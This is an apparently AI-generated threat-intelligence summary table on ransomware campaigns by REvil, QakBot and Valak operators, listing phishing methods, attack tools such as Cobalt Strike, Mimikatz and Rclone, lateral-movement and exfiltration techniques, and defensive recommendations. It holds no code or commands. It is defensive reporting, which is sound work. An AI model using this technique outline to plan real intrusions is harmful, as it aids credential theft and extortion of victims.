Category | Details |
---|---|
Threat Actors | Sodinokibi (REvil), QakBot operators, Valak operators, Ransomware affiliates |
Campaign Overview | Ransomware actors specialize in phishing-based initial access (e.g., QakBot, Valak), followed by data exfiltration and ransomware deployment to extort victims. Collaboration among threat actors enhances their operations. |
Target Regions (Victims) | Enterprises with valuable data (e.g., financial, IP, healthcare, HR, and backup data) across multiple industries. |
Methodology | Phishing emails with malicious Office documents (Excel, Word); use of tools like QakBot, Valak, Cobalt Strike, Rclone, and plink.exe for reconnaissance, lateral movement, and data exfiltration. |
Product Targeted | Systems with Microsoft Office, Active Directory, and critical internal file shares. |
Malware Reference | QakBot, Valak, Sodinokibi ransomware |
Tools Used | Cobalt Strike, NetSupport Manager, Mimikatz, Rclone, MegaSync, MegaCmd, WinSCP, AdFind, nltest, plink.exe, ngrok.exe |
Vulnerabilities Exploited | Use of phishing techniques and credential harvesting to bypass protections; exploitation of tools inherent to systems (e.g., SMB protocol, RDP tunneling). |
TTPs | Double extortion, phishing campaigns, lateral movement (e.g., PowerShell payloads, SCM, and admin shares), credential harvesting, RDP tunneling, and GPO misuse for ransomware deployment. |
Attribution | Eastern European cybercrime origin; collaboration among ransomware groups like Egregor, Clop, Ryuk, DoppelPaymer. |
Recommendations | Implement EDR, LAPS, SMB hardening, MFA, PAM, internal network segmentation, vulnerability management, and restrict admin privileges. |
Source | Security Intelligence |
Read full article: Read More
Disclaimer: The above summary has been generated by an AI language model.
Leave a Reply